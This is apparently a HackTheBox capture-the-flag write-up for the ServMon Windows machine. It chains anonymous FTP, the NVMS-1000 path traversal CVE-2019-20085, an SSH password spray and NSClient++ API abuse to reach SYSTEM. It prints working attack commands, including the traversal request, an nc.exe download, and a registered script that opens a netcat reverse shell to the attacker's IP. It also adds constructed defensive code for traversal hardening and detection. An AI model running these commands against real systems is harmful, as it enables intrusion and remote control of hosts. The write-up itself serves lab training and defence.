ServMon
Easy Windows · HackTheBox · Anonymous FTP · CVE-2019-20085 · Path Traversal · NSClient++
Easy Windows machine that chains four misconfigurations together. Anonymous FTP leaks an internal note revealing that Passwords.txt lives on Nathan's Desktop. NVMS-1000's unauthenticated path traversal (CVE-2019-20085) reads that file without any credentials. Password spraying over SSH lands a shell as nadine. NSClient++ — a monitoring agent running as NT AUTHORITY\SYSTEM — stores its API password in plaintext; forwarding its port via SSH tunnel and registering a malicious script through the REST API yields a SYSTEM shell.
User Flag
2687b43660xxxxxxxxxxxxxxxxxxxxxx
Root Flag
27da63c023xxxxxxxxxxxxxxxxxxxxxx
01 Reconnaissance

Full port scan surfaces anonymous FTP, SSH, HTTP (NVMS-1000), SMB, and an HTTPS service on 8443 (NSClient++).

nmap
$ nmap -sC -sV -p- --min-rate 5000 -oN nmap_full.txt 10.129.227.77
21/tcp   open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed
22/tcp   open  ssh           OpenSSH for_Windows_8.0
80/tcp   open  http          redirects to /Pages/login.htm (NVMS-1000)
445/tcp  open  microsoft-ds  Windows Server
8443/tcp open  https         NSClient++ web UI
NVMS-1000 is a network video surveillance management system by TVT with a known unauthenticated directory traversal (CVE-2019-20085) that reads arbitrary files without credentials.

NSClient++ is a Windows monitoring agent similar to Nagios NRPE. It runs as NT AUTHORITY\SYSTEM and can execute external scripts via a REST API — a classic privesc target.
02 FTP Enumeration

Anonymous FTP allows browsing both user home directories. Two files leak the entire attack path.

ftp — anonymous login
$ ftp -p 10.129.227.77
# Username: anonymous   Password: (blank)
ftp> cd Users/Nadine
ftp> get Confidential.txt
ftp> cd ../Nathan
ftp> get "Notes to do.txt"
Confidential.txt
Nathan,
I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.
Regards,
Nadine
Notes to do.txt
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS <-- NOT done
5) Place the secret files in SharePoint
key insight: Passwords.txt is on Nathan's Desktop, and NVMS public access is still open (item 4 incomplete). We can use the NVMS traversal to read the file unauthenticated.
03 Directory Traversal — CVE-2019-20085

NVMS-1000 fails to sanitize ../ sequences in GET requests, allowing unauthenticated file reads anywhere on the filesystem. Standard Python exploit scripts silently normalize the traversal sequences away — use curl --path-as-is to send the raw path to the server.

curl --path-as-is — read Passwords.txt
$ curl --path-as-is \
  "http://10.129.227.77/../../../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt"
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
Why --path-as-is? By default curl (and most HTTP libraries) normalize URLs and strip ../ before sending. This flag disables normalization and sends the raw path exactly as written — required for the traversal payload to reach the server intact.
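The bug class behind this step, shown as an added example that is not part of the original writeup: a naive file handler that joins the raw request path onto the web root, next to a hardened handler that canonicalises the path and refuses anything resolving outside the root, plus the client-side dot-segment normalisation that hides the payload unless --path-as-is is used. The web root, page and secret file are constructed in a temporary directory.

```python
import os
import posixpath
import tempfile
from pathlib import Path


def client_normalized(url_path: str) -> str:
    """What curl sends by default: dot-segments are collapsed on the client,
    so '/../../Users/x' leaves as '/Users/x' and never reaches the server as a
    traversal. --path-as-is disables exactly this step."""
    return posixpath.normpath("/" + url_path.lstrip("/"))


def serve_vulnerable(webroot: str, url_path: str) -> str:
    """Naive handler: joins the raw request path onto the web root."""
    target = os.path.join(webroot, *url_path.lstrip("/").split("/"))
    with open(target, "r", encoding="utf-8") as fh:
        return fh.read()


def serve_hardened(webroot: str, url_path: str) -> str:
    """Canonicalise first, then refuse anything outside the web root."""
    root = Path(webroot).resolve()
    candidate = (root / url_path.lstrip("/")).resolve()
    if candidate != root and root not in candidate.parents:
        raise PermissionError(f"request escapes web root: {url_path}")
    with open(candidate, "r", encoding="utf-8") as fh:
        return fh.read()


def demo() -> dict:
    """Constructed layout: a web root holding one page, and a secret one level up."""
    base = Path(tempfile.mkdtemp())
    webroot = base / "www"
    (webroot / "Pages").mkdir(parents=True)
    (webroot / "Pages" / "login.htm").write_text("login page")
    (base / "Passwords.txt").write_text("constructed-secret")
    raw = "/../Passwords.txt"
    result = {
        "seen_by_client": client_normalized(raw),
        "vulnerable_leaks": serve_vulnerable(str(webroot), raw),
        "hardened_blocks": False,
        "legit_still_served": serve_hardened(str(webroot), "/Pages/login.htm"),
    }
    try:
        serve_hardened(str(webroot), raw)
    except PermissionError:
        result["hardened_blocks"] = True
    return result
```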
04 Foothold — SSH as Nadine

Spray the recovered passwords against both known users over SSH.

hydra — password spray
$ hydra -L users.txt -P passwords.txt ssh://10.129.227.77
[22][ssh] host: 10.129.227.77   login: nadine   password: L1k3B1gBut7s@W0rk
finding: the list is Nathan's own password file, but Nadine had reused one of the entries; none of them matched Nathan's account.
SSH → user flag
$ ssh nadine@10.129.227.77
# Password: L1k3B1gBut7s@W0rk
nadine@SERVMON C:\Users\Nadine\Desktop> type user.txt
2687b43660xxxxxxxxxxxxxxxxxxxxxx
user flag obtained.
05 Privilege Escalation — NSClient++ → SYSTEM

NSClient++ is bound to 0.0.0.0:8443 but its config restricts API connections to 127.0.0.1 only. The config also stores the API password in plaintext. We bypass the localhost restriction with an SSH tunnel, then use the REST API to register and execute a reverse shell script — the service runs as SYSTEM.

Step 1 — Read nsclient.ini

nsclient.ini — credentials
nadine> type "C:\Program Files\NSClient++\nsclient.ini"
password = ew2x6SsGTxjRwXOT
allowed hosts = 127.0.0.1

Step 2 — SSH Port Forward

SSH tunnel → localhost:8443
$ ssh -L 8443:127.0.0.1:8443 nadine@10.129.227.77 -N -f
$ ss -tlnp | grep 8443
LISTEN 0 128 127.0.0.1:8443 0.0.0.0:*

Step 3 — Verify API Access

curl — NSClient++ API info
$ curl -k --tlsv1.0 -u admin:ew2x6SsGTxjRwXOT \
  https://127.0.0.1:8443/api/v1/info
{"name":"NSClient++","version":"0.5.2.35 2018-01-28",...}
TLS gotcha: NSClient++ 0.5.2 uses old TLS. Pass -k (skip cert verification) and --tlsv1.0. Run all API calls from Kali — the Windows curl inside the SSH session uses schannel and also fails on SSL errors.

Step 4 — Upload nc.exe to Target

serve nc.exe → download on target
# Kali
$ cp /usr/share/windows-binaries/nc.exe .
$ python3 -m http.server 8080

# SSH session on target
nadine> mkdir C:\Temp
nadine> curl http://YOUR_KALI_IP:8080/nc.exe -o C:\Temp\nc.exe

Step 5 — Register Malicious Script via API

PUT script — register evil.bat
$ curl -k --tlsv1.0 -u admin:ew2x6SsGTxjRwXOT \
  -X PUT "https://127.0.0.1:8443/api/v1/scripts/ext/scripts/evil.bat" \
  --data-binary "C:\\Temp\\nc.exe YOUR_KALI_IP 4444 -e cmd.exe"
Added evil as scripts\evil.bat

Step 6 — Start Listener and Execute

trigger → SYSTEM shell
# terminal 1 — listener
$ nc -lvnp 4444

# terminal 2 — execute the registered script
$ curl -k --tlsv1.0 -u admin:ew2x6SsGTxjRwXOT \
  "https://127.0.0.1:8443/api/v1/queries/evil/commands/execute?time=3m"

# shell received:
connect to [10.10.14.78] from (UNKNOWN) [10.129.227.77]
C:\Program Files\NSClient++> whoami
nt authority\system
Why does this work? NSClient++ runs as a Windows service under NT AUTHORITY\SYSTEM. When it executes the registered script, the spawned process inherits that SYSTEM context — no further exploitation needed.
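A detection for this last step, added here as an example and not part of the writeup: process-creation events (constructed, with nscp.exe assumed as the NSClient++ service image and made-up PIDs) are walked up their parent chain, and any shell or netcat running as SYSTEM whose ancestry leads back to the NSClient++ install directory is flagged, including grandchildren such as the nc.exe spawned by evil.bat.

```python
from dataclasses import dataclass
from typing import Dict, List, Optional

# Install directory from the writeup's SYSTEM shell prompt; comparisons are case-folded.
NSCLIENT_DIR = "c:\\program files\\nsclient++\\"
# Children a monitoring agent has no business spawning.
SHELLS = {"cmd.exe", "powershell.exe", "nc.exe"}


@dataclass
class ProcessEvent:
    """Minimal process-creation record (fields Sysmon event 1 / Security 4688 carry)."""
    pid: int
    ppid: int
    image: str
    command_line: str
    user: str


def descends_from_nsclient(ev: ProcessEvent, by_pid: Dict[int, ProcessEvent]) -> bool:
    """Walk the ancestry until an NSClient++ image is found or the chain ends."""
    seen = set()
    cur: Optional[ProcessEvent] = by_pid.get(ev.ppid)
    while cur is not None and cur.pid not in seen:
        if cur.image.lower().startswith(NSCLIENT_DIR):
            return True
        seen.add(cur.pid)
        cur = by_pid.get(cur.ppid)
    return False


def find_alerts(events: List[ProcessEvent]) -> List[str]:
    """Command lines of SYSTEM shells/netcat whose ancestry leads back to NSClient++."""
    by_pid = {ev.pid: ev for ev in events}
    return [
        ev.command_line for ev in events
        if ev.image.lower().rsplit("\\", 1)[-1] in SHELLS
        and ev.user.upper() == "NT AUTHORITY\\SYSTEM"
        and descends_from_nsclient(ev, by_pid)
    ]


# Constructed telemetry modelled on the writeup's evil.bat run (nscp.exe and PIDs assumed).
SAMPLE_EVENTS = [
    ProcessEvent(700, 600, r"C:\Program Files\NSClient++\nscp.exe", "nscp.exe", r"NT AUTHORITY\SYSTEM"),
    ProcessEvent(1532, 700, r"C:\Windows\System32\cmd.exe",
                 r'cmd.exe /c "C:\Program Files\NSClient++\scripts\evil.bat"', r"NT AUTHORITY\SYSTEM"),
    ProcessEvent(1540, 1532, r"C:\Temp\nc.exe", r"C:\Temp\nc.exe 10.10.14.78 4444 -e cmd.exe", r"NT AUTHORITY\SYSTEM"),
    ProcessEvent(2210, 1540, r"C:\Windows\System32\cmd.exe", "cmd.exe", r"NT AUTHORITY\SYSTEM"),
    ProcessEvent(3001, 2900, r"C:\Windows\System32\cmd.exe", "cmd.exe", r"SERVMON\nadine"),  # benign user shell
]
```

Auditing the ini file's ACL and removing the external-scripts capability where it is not needed removes the path entirely; the detection above catches the case where it is still enabled.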
06 Root Flag
root flag
C:\Program Files\NSClient++> type C:\Users\Administrator\Desktop\root.txt
27da63c023xxxxxxxxxxxxxxxxxxxxxx
attack chain:
Anonymous FTP → Confidential.txt (password file location leak)
→ NVMS-1000 path traversal (CVE-2019-20085) + --path-as-is → Passwords.txt
→ Hydra spray → nadine:L1k3B1gBut7s@W0rk
→ SSH → nsclient.ini plaintext password
→ SSH port forward → NSClient++ REST API
→ PUT evil.bat → execute → SYSTEM